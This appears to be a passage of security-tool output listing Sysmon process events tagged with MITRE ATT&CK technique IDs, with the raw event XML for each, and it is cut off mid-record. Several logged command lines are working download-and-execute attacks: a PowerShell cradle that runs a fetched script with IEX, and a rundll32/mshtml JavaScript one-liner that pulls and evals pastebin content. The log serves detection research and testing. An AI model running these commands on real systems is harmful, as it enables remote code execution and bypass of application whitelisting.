<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:23.507565Z"">
</TimeCreated>
<EventRecordID>4912</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:23.380</Data>
<Data Name=""ProcessGuid"">747F3D96-6623-5D3F-0000-0010BC068800</Data>
<Data Name=""ProcessId"">3000</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">powershell -c &quot;(New-Object Net.WebClient).DownloadFile(&apos;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt&apos;,&apos;Default_File_Path.ps1&apos;);IEX((-Join([IO.File]::ReadAllBytes(&apos;Default_File_Path.ps1&apos;)|ForEach-Object{[Char]$_})))&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6623-5D3F-0000-001011F68700</Data>
<Data Name=""ParentProcessId"">5816</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c powershell -c &quot;(New-Object Net.WebClient).DownloadFile(&apos;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt&apos;,&apos;Default_File_Path.ps1&apos;);IEX((-Join([IO.File]::ReadAllBytes(&apos;Default_File_Path.ps1&apos;)|ForEach-Object{[Char]$_})))&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1202] Indirect Command Execution,1557680511.00795,2019-05-12T21:01:51.007950+04:00,,Threat,Medium,Found User (IEWIN7\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried accessing powershell history through commandline ( &quot;C:\Windows\System32\pcalua.exe&quot; -a c:\Windows\system32\calc.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T17:01:50.781015Z"">
</TimeCreated>
<EventRecordID>16497</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2012"" ThreadID=""300"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 17:01:50.781</Data>
<Data Name=""ProcessGuid"">365ABB72-517E-5CD8-0000-001024D61700</Data>
<Data Name=""ProcessId"">2952</Data>
<Data Name=""Image"">C:\Windows\System32\pcalua.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Program Compatibility Assistant</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\pcalua.exe&quot; -a c:\Windows\system32\calc.exe</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-4FB5-5CD8-0000-0020F2350100</Data>
<Data Name=""LogonId"">0x135f2</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=ABB6319976D9702E0C80978D51C0AEE88A33D201,MD5=D652BA887500816431566B524292ECCB,SHA256=65446AF2997779DB6CDAEFB2ABC2994CA9F2A2477C882BC3A5F828BBFFB83CEE,IMPHASH=256CD8CEDFD4FCB3BC9DB32E27E5923A</Data>
<Data Name=""ParentProcessGuid"">365ABB72-516B-5CD8-0000-001087E41600</Data>
<Data Name=""ParentProcessId"">3788</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,1564436004.104732,2019-07-30T01:33:24.104732+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell -c &quot;(New-Object Net.WebClient).DownloadFile(&apos;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt&apos;,&apos;Default_File_Path.ps1&apos;);IEX((-Join([IO.File]::ReadAllBytes(&apos;Default_File_Path.ps1&apos;)|ForEach-Object{[Char]$_})))&quot; )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:23.507565Z"">
</TimeCreated>
<EventRecordID>4912</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:23.380</Data>
<Data Name=""ProcessGuid"">747F3D96-6623-5D3F-0000-0010BC068800</Data>
<Data Name=""ProcessId"">3000</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">powershell -c &quot;(New-Object Net.WebClient).DownloadFile(&apos;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt&apos;,&apos;Default_File_Path.ps1&apos;);IEX((-Join([IO.File]::ReadAllBytes(&apos;Default_File_Path.ps1&apos;)|ForEach-Object{[Char]$_})))&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6623-5D3F-0000-001011F68700</Data>
<Data Name=""ParentProcessId"">5816</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c powershell -c &quot;(New-Object Net.WebClient).DownloadFile(&apos;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt&apos;,&apos;Default_File_Path.ps1&apos;);IEX((-Join([IO.File]::ReadAllBytes(&apos;Default_File_Path.ps1&apos;)|ForEach-Object{[Char]$_})))&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564126781.211276,2019-07-26T11:39:41.211276+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; /c copy /Y C:\Windows\system32\rundll32.exe %%TEMP%%\out.exe &gt; nul &amp;&amp; %%TEMP%%\out.exe javascript:&quot;\..\mshtml RunHTMLApplication &quot;;document.write();h=new%%20ActiveXObject(&quot;WinHttp.WinHttpRequest.5.1&quot;);h.Open(&quot;GET&quot;,&quot;http://pastebin.com/raw/y2CjnRtH&quot;,false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;cmd /c taskkill /f /im out.exe&quot;,0,true);} )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-26T07:39:14.935857Z"">
</TimeCreated>
<EventRecordID>4353</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""5924"" ThreadID=""6056"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-26 07:39:14.853</Data>
<Data Name=""ProcessGuid"">747F3D96-AE22-5D3A-0000-001004D84E00</Data>
<Data Name=""ProcessId"">5548</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /c copy /Y C:\Windows\system32\rundll32.exe %%TEMP%%\out.exe &gt; nul &amp;&amp; %%TEMP%%\out.exe javascript:&quot;\..\mshtml RunHTMLApplication &quot;;document.write();h=new%%20ActiveXObject(&quot;WinHttp.WinHttpRequest.5.1&quot;);h.Open(&quot;GET&quot;,&quot;http://pastebin.com/raw/y2CjnRtH&quot;,false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;cmd /c taskkill /f /im out.exe&quot;,0,true);}</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-ABD5-5D3A-0000-0020EB990F00</Data>
<Data Name=""LogonId"">0xf99eb</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-AE22-5D3A-0000-001096B24E00</Data>
<Data Name=""ParentProcessId"">1504</Data>
<Data Name=""ParentImage"">C:\Windows\hh.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\hh.exe&quot; C:\Users\IEUser\Desktop\Fax Record N104F.chm</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1074] Data Staged - Process,1564436004.104732,2019-07-30T01:33:24.104732+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell -c &quot;(New-Object Net.WebClient).DownloadFile(&apos;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt&apos;,&apos;Default_File_Path.ps1&apos;);IEX((-Join([IO.File]::ReadAllBytes(&apos;Default_File_Path.ps1&apos;)|ForEach-Object{[Char]$_})))&quot; )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:23.507565Z"">
</TimeCreated>
<EventRecordID>4912</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:23.380</Data>
<Data Name=""ProcessGuid"">747F3D96-6623-5D3F-0000-0010BC068800</Data>
<Data Name=""ProcessId"">3000</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">powershell -c &quot;(New-Object Net.WebClient).DownloadFile(&apos;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt&apos;,&apos;Default_File_Path.ps1&apos;);IEX((-Join([IO.File]::ReadAllBytes(&apos;Default_File_Path.ps1&apos;)|ForEach-Object{[Char]$_})))&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6623-5D3F-0000-001011F68700</Data>
<Data Name=""ParentProcessId"">5816</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c powershell -c &quot;(New-Object Net.WebClient).DownloadFile(&apos;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt&apos;,&apos;Default_File_Path.ps1&apos;);IEX((-Join([IO.File]::ReadAllBytes(&apos;Default_File_Path.ps1&apos;)|ForEach-Object{[Char]$_})))&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1557668280.712733,2019-05-12T17:38:00.712733+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:38:00.523670Z"">
</TimeCreated>
<EventRecordID>16395</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""1996"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:38:00.523</Data>
<Data Name=""ProcessGuid"">365ABB72-21B8-5CD8-0000-0010BADE2600</Data>
<Data Name=""ProcessId"">3856</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta</Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
<Data Name=""LogonId"">0x13a10</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-2006-5CD8-0000-0010E0912300</Data>
<Data Name=""ParentProcessId"">2936</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557668280.712733,2019-05-12T17:38:00.712733+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:38:00.523670Z"">
</TimeCreated>
<EventRecordID>16395</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""1996"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:38:00.523</Data>
<Data Name=""ProcessGuid"">365ABB72-21B8-5CD8-0000-0010BADE2600</Data>
<Data Name=""ProcessId"">3856</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta</Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
<Data Name=""LogonId"">0x13a10</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-2006-5CD8-0000-0010E0912300</Data>
<Data Name=""ParentProcessId"">2936</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1557668280.712733,2019-05-12T17:38:00.712733+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:38:00.523670Z"">
</TimeCreated>
<EventRecordID>16395</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""1996"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:38:00.523</Data>
<Data Name=""ProcessGuid"">365ABB72-21B8-5CD8-0000-0010BADE2600</Data>
<Data Name=""ProcessId"">3856</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta</Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
<Data Name=""LogonId"">0x13a10</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-2006-5CD8-0000-0010E0912300</Data>
<Data Name=""ParentProcessId"">2936</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1553028075.144276,2019-03-20T00:41:15.144276+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T20:41:15.144276Z"">
</TimeCreated>
<EventRecordID>1966251</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1564"" ThreadID=""1252"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 20:36:04.206</Data>
<Data Name=""ProcessGuid"">365ABB72-52B4-5C91-0000-0010355B0100</Data>
<Data Name=""ProcessId"">1628</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-528D-5C91-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-528D-5C91-0000-001062560000</Data>
<Data Name=""ParentProcessId"">484</Data>
<Data Name=""ParentImage"">C:\Windows\System32\services.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\services.exe</Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1602935016.312645,2020-10-17T15:43:36.312645+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( &quot;C:\Windows\System32\rundll32.exe&quot;)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-17T11:43:36.306601Z"">
</TimeCreated>
<EventRecordID>417079</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3500"" ThreadID=""4688"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-17 11:43:36.303</Data>
<Data Name=""ProcessGuid"">747F3D96-D8E8-5F8A-0000-00102CEF7200</Data>
<Data Name=""ProcessId"">840</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Roaming\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-CA8D-5F8A-0000-0020D1090A00</Data>
<Data Name=""LogonId"">0xa09d1</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
